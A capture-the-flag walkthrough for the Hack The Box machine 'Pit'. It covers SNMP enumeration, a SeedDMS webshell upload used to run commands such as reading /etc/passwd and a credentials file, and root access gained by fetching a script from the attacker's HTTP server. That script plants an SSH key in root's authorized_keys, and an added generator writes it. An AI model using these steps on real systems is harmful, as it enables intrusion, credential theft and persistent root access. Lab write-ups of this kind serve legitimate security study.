Enumeration
Scan for open ports with RustScan, handing the results to nmap for script and version detection:
rustscan -a 10.10.10.241 -- -sCV
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-34.png?w=1004)
Port 9090 is open (Cockpit), so we browse to https://10.10.10.241:9090/
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-48.png?w=1024)
But without credentials we cannot log in.
The nmap output also reveals a hostname: dms-pit.htb
Add it to /etc/hosts:
10.10.10.241 dms-pit.htb
But the web server answers with Forbidden.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-38.png?w=328)
TCP gave us little, so run a UDP scan as well (UDP scans are slow, so be patient):
sudo nmap -sCVU 10.10.10.241
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-35.png?w=616)
Port 161/udp is open, running SNMP (Simple Network Management Protocol).
We dump everything the agent will give us with the snmpbw.pl bulk-walk script, using the default community string public; it writes the results to 10.10.10.241.snmp:
./snmpbw.pl 10.10.10.241 public 2 1
cat 10.10.10.241.snmp
The dump reveals directories:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-36.png?w=631)
and usernames:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-40.png?w=642)
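Reading a full SNMP dump by hand is tedious, so here is an added helper (my code, not from the original post) that triages a saved walk for the three things that paid off on this box: commands snmpd runs via extend, process command lines, and absolute paths leaked anywhere in the output. It assumes the MIB-name output format snmpwalk prints when MIBs are loaded; the sample dump embedded at the bottom is constructed for the demo and is not the box's real output. Point it at 10.10.10.241.snmp (or the output of snmpwalk -v2c -c public 10.10.10.241) instead.

```bash
#!/bin/bash
# Added example (not from the original post): triage a saved snmpwalk /
# snmpbulkwalk dump for the things that mattered on this box:
#  - commands registered with "extend" in snmpd.conf (NET-SNMP-EXTEND-MIB)
#  - running processes with their arguments (HOST-RESOURCES-MIB hrSWRun*)
#  - absolute filesystem paths leaked anywhere in the output
# Input format: the MIB-name form snmpwalk prints by default (assumed).
# The sample dump at the bottom is constructed for the demo.

# Commands registered with "extend <name> <cmd>" in snmpd.conf.
# Walking nsExtendObjects later makes snmpd run each of these.
snmp_extend_commands() {
    grep -E 'nsExtendCommand\.' "$1" | sed -E 's/.*= STRING: *//'
}

# One line per process: "<pid> <name> <arguments>", joined on the pid index
# that both hrSWRunName and hrSWRunParameters share.
snmp_processes() {
    awk '
        match($0, /hrSWRunName\.[0-9]+/) {
            pid = substr($0, RSTART + 12, RLENGTH - 12)
            sub(/.*STRING: /, ""); gsub(/"/, ""); name[pid] = $0
        }
        match($0, /hrSWRunParameters\.[0-9]+/) {
            pid = substr($0, RSTART + 18, RLENGTH - 18)
            sub(/.*STRING: /, ""); gsub(/"/, ""); args[pid] = $0
        }
        END { for (p in name) printf "%s %s %s\n", p, name[p], args[p] }
    ' "$1" | sort -n
}

# Every absolute path with at least two components, de-duplicated.
# This is the kind of line that exposed /usr/bin/monitor and the SeedDMS
# directory on this box.
snmp_paths() {
    grep -oE '/[A-Za-z0-9._-]+(/[A-Za-z0-9._-]+)+' "$1" | sort -u
}

# --- demo on a constructed dump (not real output from the target) ----------
dump=$(mktemp)
trap 'rm -f "$dump"' EXIT
cat > "$dump" <<'EOF'
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.1040 = STRING: "httpd"
HOST-RESOURCES-MIB::hrSWRunName.1102 = STRING: "snmpd"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--switched-root --system"
HOST-RESOURCES-MIB::hrSWRunParameters.1040 = STRING: "-DFOREGROUND"
HOST-RESOURCES-MIB::hrSWRunParameters.1102 = STRING: "-LS0-6d -f"
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Checking /var/www/html/seeddms51x/seeddms
EOF

echo "[*] extend commands:"; snmp_extend_commands "$dump"
echo "[*] processes:";       snmp_processes "$dump"
echo "[*] paths:";           snmp_paths "$dump"
```

The extend commands are the ones to look at first: anything listed under nsExtendCommand is executed by snmpd, with snmpd's privileges, every time someone walks nsExtendObjects, which is exactly what the privilege escalation on this box relies on.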
Browse to the directory we found:
http://dms-pit.htb/seeddms51x/seeddms
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-39.png?w=1024)
We can log in with one of the usernames from the SNMP dump; the password is the same as the username.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-41.png?w=1024)
Searching Exploit Database for SeedDMS turns up "SeedDMS versions < 5.1.11 - Remote Command Execution": an authenticated user can upload a PHP file as a document, and the web server executes it straight out of the data directory.
Go to Docs -> Users -> Michelle:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-42.png?w=1024)
Add a document and upload 1.php, a small PHP webshell that runs whatever is passed in the cmd parameter.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-44.png?w=1024)
Then request the uploaded file directly from the data directory (the document id, 32 here, will differ for your upload):
http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=cat+/etc/passwd
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-45.png?w=722)
The command executes.
A little more enumeration turns up the SeedDMS configuration file, which contains a password:
http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml
View the page source for a readable view of the XML:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-46.png?w=1024)
Foothold
Using the password from settings.xml with the username we found before, we can log in to Cockpit at https://pit.htb:9090/
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-47.png?w=1024)
Cockpit has a built-in Terminal; open it and we can read the user flag:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-51.png?w=1024)
Privilege Escalation
Going back through the SNMP dump, we also found a script that snmpd runs:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-52.png?w=922)
cat /usr/bin/monitor
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-53.png?w=406)
It executes scripts from /usr/local/monitoring, so we will create a check.sh there for /usr/bin/monitor to run.
On our machine, generate an SSH key pair:
ssh-keygen
Create check.sh with the following content (replace your-public-key with the contents of the .pub file):
#!/bin/bash
echo 'your-public-key' > /root/.ssh/authorized_keys
Serve it over HTTP:
python3 -m http.server 8080
In michelle's Cockpit terminal, fetch it into the monitoring directory:
curl http://10.10.16.4:8080/check.sh -o /usr/local/monitoring/check.sh
With the file in place, back on our machine, install the MIBs and walk nsExtendObjects; that walk is what makes snmpd execute its extend command, /usr/bin/monitor:
sudo apt-get install snmp-mibs-downloader
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
If the MIB does not load, the numeric OID of nsExtendObjects works without any MIB files: snmpwalk -v2c -c public 10.10.10.241 1.3.6.1.4.1.8072.1.3.2
snmpd runs /usr/bin/monitor as root, so check.sh runs as root and drops our key into /root/.ssh/authorized_keys. Connect over SSH:
ssh -i id_rsa root@10.10.10.241
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-54.png?w=352)
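The one-line check.sh above works on this box, but it glosses over two things: /root/.ssh may not exist, and `>` wipes out any authorized_keys root already has, which is both noisy and a good way to lock out a legitimate key. Here is an added generator (my code, not from the original post) that writes a more careful check.sh from a public-key file and refuses anything that is not a single OpenSSH key line. The key in the demo is a constructed placeholder, not a real key; /usr/local/monitoring and /root/.ssh are the paths from the box.

```bash
#!/bin/bash
# Added example (not from the original post): build the check.sh that
# /usr/bin/monitor will execute, without assuming /root/.ssh exists and
# without clobbering keys already present in authorized_keys.
# The public key used in the demo is a constructed placeholder; point
# make_check_sh at your own id_ed25519.pub or id_rsa.pub instead.

# Accept only a single OpenSSH public-key line, so a stray file never ends up
# being echoed into root's authorized_keys.
valid_pubkey() {
    [ "$(grep -c . "$1")" -eq 1 ] &&
    grep -qE '^(ssh-(ed25519|rsa)|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( |$)' "$1"
}

# make_check_sh <pubkey_file> <out_file>
# Writes the script that runs as root once snmpd executes /usr/bin/monitor.
# Only the key type and key data are kept; the comment field is dropped so the
# line is safe to wrap in single quotes.
make_check_sh() {
    key=
    valid_pubkey "$1" || { echo "not an OpenSSH public key: $1" >&2; return 1; }
    key=$(awk '{ print $1 " " $2 }' "$1")
    {
        printf '#!/bin/bash\n'
        printf 'mkdir -p /root/.ssh && chmod 700 /root/.ssh\n'
        # append (>>) rather than overwrite, so existing keys stay in place
        printf "echo '%s' >> /root/.ssh/authorized_keys\n" "$key"
        printf 'chmod 600 /root/.ssh/authorized_keys\n'
    } > "$2"
    chmod +x "$2"
}

# --- demo with a constructed placeholder key ---------------------------------
work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT
printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyNotRealAAAAAAAAAAAAAAAAAAAA attacker@kali\n' \
    > "$work/id_ed25519.pub"
make_check_sh "$work/id_ed25519.pub" "$work/check.sh"
cat "$work/check.sh"
```

Stage the generated file exactly as in the walkthrough: serve it with python3 -m http.server 8080, fetch it from michelle's terminal into /usr/local/monitoring/check.sh, walk nsExtendObjects, then ssh -i with the matching private key.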